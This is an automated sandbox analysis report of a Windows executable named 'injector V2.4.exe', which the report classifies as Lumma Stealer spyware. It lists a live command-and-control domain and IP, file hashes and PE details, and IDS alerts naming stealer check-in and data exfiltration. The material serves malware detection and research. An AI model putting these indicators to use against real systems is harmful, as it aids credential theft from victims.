https://ac.ecosia.org/autocomplete?q=	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	injector V2.4.exe	false		high
https://fumblingactor.cyou/api;	injector V2.4.exe, 00000004.00000003.2254099466.0000000000545000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	injector V2.4.exe	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.219.199	fumblingactor.cyou	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560307
Start date and time:	2024-11-21 16:51:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	injector V2.4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/0@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 82% Number of executed functions: 31 Number of non-executed functions: 121
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target injector V2.4.exe, PID 3720 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: injector V2.4.exe

Simulations

Behavior and APIs

Time	Type	Description
10:52:00	API Interceptor	8x Sleep call for process: injector V2.4.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.219.199	Loader.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fumblingactor.cyou	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.219.199

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	injector V2.5.exe	Get hash	malicious	LummaC	Browse	104.21.43.198
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
	payments.exe	Get hash	malicious	FormBook	Browse	172.67.209.48
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	104.21.41.74
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	162.159.61.3
	http://xmrminingproxy.com	Get hash	malicious	Unknown	Browse	104.21.6.188
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
	VMX.exe	Get hash	malicious	LummaC	Browse	172.67.198.61
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	104.21.15.40
	https://spacardportal.works.com/gar	Get hash	malicious	Unknown	Browse	104.18.86.42

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	injector V2.5.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	file.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.219.199
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	VMX.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	ADZ Laucher.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	Hexium.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	BlazeVaze.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	ExL4unch#U20ac#U00ae.exe	Get hash	malicious	LummaC	Browse	172.67.219.199

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.6938188325289145
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	injector V2.4.exe
File size:	587'904 bytes
MD5:	837840f37e344f8e7bc187f88f93c4a8
SHA1:	782edf606d07812ec71254cc9cf2260da2e3fd51
SHA256:	02ec8860240f90b920bb2692f651d0ec712e511e0bd17a3b1048382fdfdcb4d8
SHA512:	025068c49129a0d40235a9c80b6473e86b4d1209fabe953ac425628ad98e3b64106777014b5c20d24324991618d901c662feb69dc76cd7f68f39e415887c8480
SSDEEP:	12288:SRgyqSwAN2kLkjnP13tGIGef4cDDKeCxeAn3tCk9Rj71Mlr7v:ig2N2kLkTd3AIGFcDtSVvCr7v
TLSH:	6EC4D0165241E893F88728FF39A2A31334E63372B7B1CDD3C075796897801C195EAD6E
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....2?g.................V........................@.......................................@.................................T...(..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4292c0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x673F321B [Thu Nov 21 13:14:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3a33a82bcd5969a5b19ce5fba049e5b4

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	30/08/2023 20:00:00 30/08/2026 19:59:59
Subject Chain	CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
Version:	3
Thumbprint MD5:	AD1BCBF19AE2F91BB114D33B85359E56
Thumbprint SHA-1:	141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
Thumbprint SHA-256:	A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
Serial:	00D0461B529F67189D43744E9CEFE172AE

Entrypoint Preview

Instruction
call 00007FE994DE584Bh
jmp 00007FE994DE545Dh
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007FE994DE55FFh
neg eax
pop ecx
sbb eax, eax
neg eax
dec eax
pop ebp
ret
push ebp
mov ebp, esp
cmp dword ptr [0043E488h], FFFFFFFFh
push dword ptr [ebp+08h]
jne 00007FE994DE55F9h
call 00007FE994DE747Bh
jmp 00007FE994DE55FDh
push 0043E488h
call 00007FE994DE73FEh
pop ecx
neg eax
pop ecx
sbb eax, eax
not eax
and eax, dword ptr [ebp+08h]
pop ebp
ret
push 00000008h
push 0043C8E0h
call 00007FE994DE5B6Dh
and dword ptr [ebp-04h], 00000000h
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
jne 00007FE994DE564Fh
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007FE994DE563Eh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007FE994DE5630h
mov eax, dword ptr [ebp+08h]
mov ecx, 00400000h
sub eax, ecx
push eax
push ecx
call 00007FE994DE5772h
pop ecx
pop ecx
test eax, eax
je 00007FE994DE5619h
cmp dword ptr [eax+24h], 00000000h
jl 00007FE994DE5613h
mov dword ptr [ebp-04h], FFFFFFFEh
mov al, 01h
jmp 00007FE994DE5611h
mov eax, dword ptr [ebp-14h]
mov eax, dword ptr [eax]
xor ecx, ecx
cmp dword ptr [eax], C0000005h
sete cl
mov eax, ecx
ret
mov esp, dword ptr [ebp-18h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c054	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8ca00	0x2e80	.coS
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x2608	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x37160	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3c198	0x11c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3544c	0x35600	479743414830a5568bcada3f710e0c1a	False	0.49541221457845436	data	6.9570693373870895	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x37000	0x5e44	0x6000	fa3c2f19487ee30f8cd241552465a803	False	0.4083251953125	data	4.760675312198424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x1ba4	0x1000	ff4f8fd6963b4f7d1c08f13031fa0788	False	0.470703125	OpenPGP Secret Key	4.849894766585126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg	0x3f000	0x8	0x200	056d58e83a0a9dfd46d11d226dee9030	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x2608	0x2800	01d8884685c61e5615f1d070b294bafc	False	0.7767578125	data	6.602867365262165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.coS	0x43000	0x4d400	0x4d400	a33d850a0dd95b64501f12ccaf3b91d4	False	1.0003350020226538	data	7.999392363076688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, CompareStringW, CreateFileA, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T16:51:59.946351+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	172.67.219.199	443	TCP
2024-11-21T16:52:00.661859+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49710	172.67.219.199	443	TCP
2024-11-21T16:52:00.661859+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49710	172.67.219.199	443	TCP
2024-11-21T16:52:02.044217+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	172.67.219.199	443	TCP
2024-11-21T16:52:02.776657+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49711	172.67.219.199	443	TCP
2024-11-21T16:52:02.776657+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49711	172.67.219.199	443	TCP
2024-11-21T16:52:04.519436+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	172.67.219.199	443	TCP
2024-11-21T16:52:06.697059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	172.67.219.199	443	TCP
2024-11-21T16:52:09.534774+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49714	172.67.219.199	443	TCP
2024-11-21T16:52:12.576375+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	172.67.219.199	443	TCP
2024-11-21T16:52:13.294353+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49715	172.67.219.199	443	TCP
2024-11-21T16:52:14.933335+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	172.67.219.199	443	TCP
2024-11-21T16:52:14.962103+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49716	172.67.219.199	443	TCP
2024-11-21T16:52:18.362746+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49726	172.67.219.199	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 16:51:58.620428085 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:51:58.620517969 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:51:58.620623112 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:51:58.621697903 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:51:58.621732950 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:51:59.946183920 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:51:59.946351051 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:51:59.955280066 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:51:59.955375910 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:51:59.955753088 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.000746965 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.011095047 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.011096001 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.011274099 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.661765099 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.661861897 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.661930084 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.663952112 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.663953066 CET	49710	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.664019108 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.664057016 CET	443	49710	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.730468035 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.730580091 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:00.730658054 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.731067896 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:00.731118917 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.043999910 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.044217110 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.045319080 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.045351028 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.045696974 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.046920061 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.046962976 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.047024965 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.776659966 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.776709080 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.776846886 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.776889086 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.776904106 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.776935101 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.776983976 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.777036905 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.777038097 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.777115107 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.785844088 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.785917997 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.785936117 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.794466019 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.794557095 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.794572115 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.844377995 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.896539927 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.938222885 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.938292980 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.985074997 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:02.987059116 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.987397909 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:02.987476110 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:03.158643961 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:03.158643961 CET	49711	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:03.158723116 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:03.158818960 CET	443	49711	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:03.295933008 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:03.296041012 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:03.296202898 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:03.296493053 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:03.296531916 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:04.519198895 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:04.519435883 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:04.521171093 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:04.521203995 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:04.521569014 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:04.523251057 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:04.523464918 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:04.523515940 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:05.283188105 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:05.283348083 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:05.283422947 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:05.283521891 CET	49712	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:05.283570051 CET	443	49712	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:05.403599977 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:05.403635979 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:05.403702021 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:05.404222012 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:05.404238939 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:06.696842909 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:06.697058916 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:06.698844910 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:06.698862076 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:06.699385881 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:06.701153994 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:06.701319933 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:06.701354980 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:06.701481104 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:06.743338108 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:07.503098011 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:07.503238916 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:07.503298044 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:07.517209053 CET	49713	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:07.517230034 CET	443	49713	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:08.314604998 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:08.314661980 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:08.314739943 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:08.315109015 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:08.315121889 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:09.534620047 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:09.534774065 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:09.536379099 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:09.536427021 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:09.536756039 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:09.538294077 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:09.538496971 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:09.538533926 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:09.538614988 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:09.538647890 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:10.458415985 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:10.458538055 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:10.458617926 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:10.458929062 CET	49714	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:10.458971977 CET	443	49714	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:11.288222075 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:11.288259029 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:11.288332939 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:11.288868904 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:11.288882017 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:12.576210022 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:12.576375008 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:12.577816963 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:12.577830076 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:12.578159094 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:12.579883099 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:12.579883099 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:12.579924107 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:13.294265032 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:13.294389963 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:13.294456005 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:13.294581890 CET	49715	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:13.294603109 CET	443	49715	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:13.711402893 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:13.711509943 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:13.711635113 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:13.711946964 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:13.711978912 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.933218002 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.933335066 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.935029030 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.935060024 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.935349941 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.960532904 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.961343050 CET	49716	443	192.168.2.5	172.67.219.199
Nov 21, 2024 16:52:14.961396933 CET	443	49716	172.67.219.199	192.168.2.5
Nov 21, 2024 16:52:14.961494923 CET	49716	443	192.168.2.5	172.67.219.199
